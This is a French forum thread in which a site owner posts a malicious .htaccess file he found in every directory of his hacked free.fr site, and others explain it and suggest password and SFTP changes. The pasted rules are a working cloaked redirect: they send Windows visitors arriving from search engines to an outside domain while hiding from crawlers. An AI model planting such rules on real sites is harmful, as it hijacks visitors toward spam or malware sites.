Pourquoi ce .htaccess apparait sur mes sites ?

[antoine486]

Bonjour,
Nouveau sur ce forum, je me permets de vous solliciter pour avoir une explication
concernant l'ajout intempestif d'un fichier .htaccess sur mon site (en fait deux) que
j'ai sur free.fr
En effet, ne pouvant plus accéder à un de mes sites, erreur 500, j'ai découvert la
présence du fichier .htaccess suivant (voir fin de message) dans chaque répertoire
de mon site.
Une fois supprimé (ou remplacé par un .htaccess vide) j'accède sans problème eu
site.
Mes questions :
1) Est-ce que ce fichier .htaccess serait rajouté par free.fr ou est-ce un acte malveillant ?
Sachant que j'ai d'autres sites free.fr qui ne sont pas "dérangés" par un tel fichier.
2) Que faut-il mettre ou faire pour que cela ne se reproduise plus ?
Et surtout pourquoi cela arrive - t' il ?
D'avance merci pour vos lumières et explications.
Antoine


<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*zXo.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://%{REMOTE_PORT}.bapiescafe.com/url?sa=D&source=web&cd=30&ved=0Pxw1fn0d&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=25Qsc6nL5ay9qY2LxlU3+561pw==&usg=EH2bweqYfLiWOaGerJ8Vbp&sig2=CBnGcgyPOVG1Rmx8zsG1j- [R=302,L,CO=zXo:64:%{HTTP_HOST}:10238:/:0:HttpOnly]
</IfModule>

[mipc]

au vue du script, soit c'est toi qui l'a mis, soit c'est effectivement un acte malveillant donc quelqu'un à pirater ton compte.

lorsque tu te connecte à ton compte free.fr en FTP passe au moins en sFTP et change de mode de passe augment sa complexité et son nombre de caractères, c'est le SSH File Transfer Protocole bien plus sécuriser.

parce que soit c'est du brute force soit un robot sniffer les MDP et login qui passait en clair via le protocole FTP qui n'est pas du tous sécuriser, donc GOTO SFTP et change de MDP en plus gros et plus complexe.

édit: en fait c'est curieux ça tentait de rediriger tous les USER AGENT LISTER PAR le SCRIPT vers le site "bapiescafe.com", mais semble t-il il s'agit d'un domaine en parking avec des pubs à la con, mon avis que ceux qui possède le domaine veulent se faire du frique .

[antoine486]

Merci beaucoup pour cette réponse rapide.
Je vais donc dans un premier temps changer le mot de passe qui a déjà 8 caractères mélangeant les chiffres
et les lettres, pourtant !
puis voir comment passer par sFTP.
Sachant que je passe par TotalCommander et par le ftp de free soit ftpperso.free.fr...

Si vous avez des pistes je suis preneur.
( j'ai déjà vu qu'il existe un plugin qui me permettrai d'utiliser sFtp avec TotalCommander
mais quelle est l'adresse free du ftpperso en sFTP ?
à suivre.
Antoine

[mipc]

je ne sais pas si free autorise les connexions en sFTP, je vais faire des recherches si non moi j'utilise filezilla problème celui-ci est relativement décrier pour de récent problème de fichier qui contient à la demande de l’utilisateur les logins et MDP, problèmes ses fichiers ne sont pas crypter, mais à partir du moment ou l'ordinateur est bien protéger et ne contient ni virus informatique ni malware et autres logiciels espion y a pas trop de risque.

[antoine486]

Merci. Je cherche aussi
Croyez vous que l'on puisse mettre un .htaccess qui soit verrouillé ?
Ou que je puisse tester régulièrement ?

Cela étant, je peux aussi automatiser une copie d'un .htaccess vide régulièrement, mais
ce n'est qu'une solution bancale...
Cordialement

Edit : vu sur le site, dans le tuto sur les "rewriting"
Il peut y avoir un troisième cas de figure (que nous ne vous souhaitons pas…) : votre site est totalement bloqué, aucune page ne peut être affichée, et vous avez un message indiquant « Erreur 500 ». Dans ce cas ne paniquez pas, il vous suffit de retirer le fichier .htaccess qui est incompatible avec votre hébergeur.

Comme c'est cette erreur 500 qui m'a averti que quelque chose se passait, je n'ai pas
trop à m'inquiéter de ce script... Si je revois la page 500, c'est qu'il faut que je fasse le ménage

Reste la question du snifeur de connexion FTP ! ! ! Comment passer au sFtp ...

[mipc]

apparemment je suis en train de lire qu'il n'y a pas et n'y aura pas de sFTP sur les site héberger chez free quelque soit le site en .free.fr, la balle est dans le camp de FREE c'es à FREE de proposer cet fonction ou de trouver une autre solution d'hébergement, une topic que j'ai trouver c'est: http://www.aduf.org/viewtopic.php?t=60831

donc y aura pas de sFTP chez FREE par contre change le MDP de tom compte de gestion de ton site et change le MDP régulièrement une fois par mois ou plus par exemple.

le compte de gestion sur le quel tu va sur FREE.fr, change et augment la complexité du mdp de ton compte de gestion FREE, ainsi que le MDP de ton FTP, aussi augmente le nombre de caractère et change régulièrement de mdp.

[antoine486]

Merci pour tes recherches et ton aide.
Antoine